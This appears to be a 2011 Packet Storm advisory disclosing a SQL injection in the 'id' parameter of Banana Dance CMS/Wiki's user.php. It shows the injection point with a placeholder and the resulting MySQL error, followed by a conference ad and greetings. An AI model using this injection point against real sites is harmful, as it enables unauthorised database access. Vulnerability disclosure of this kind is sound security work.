exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Banana Dance CMS / Wiki SQL Injection

Banana Dance CMS / Wiki SQL Injection
Posted Oct 2, 2011
Authored by Aodrulez

Banana Dance CMS and Wiki suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 721c9726b4ee05fc640d8842044c0ae02a135b4cde547fc6771d89654c9499d1

Banana Dance CMS / Wiki SQL Injection

Change Mirror Download
+-----------------------+
| Banana Dance CMS+Wiki |
+-----------------------+

Vulnerable Web-App : Banana Dance CMS+Wiki
Vulnerability : SQLi
Author : Aodrulez.
Email : f3arm3d3ar@gmail.com
Google-Dork : :) Guess it.
Tested on : Ubuntu 10.04
Web-App : http://www.doyoubananadance.com/
Download Link : http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7


+---------+
| Details |
+---------+

1] SQLi
Exploit : http://localhost/user.php?id=1'[sqli]

Error:
------
Invalid query:
SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='1''
Error: You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right
syntax to use near ''1''' at line 1



+----------+
| MalCon |
+----------+
(International Malware Conference)

The CFP for MalCon-2011 is ON!
If you think you are good enough, try cracking our
'Capture the Mal Challenge-2011' online.
Open to everyone!

For more details, visit http://malcon.org




+-------------------+
| Greetz Fly Out To |
+-------------------+


1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
7] www.nsd.org.in
8] LiquidWorm

+-------+
| Quote |
+-------+

"Microsoft is not the answer. Microsoft is the question. NO is the answer." - Erik Naggum

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close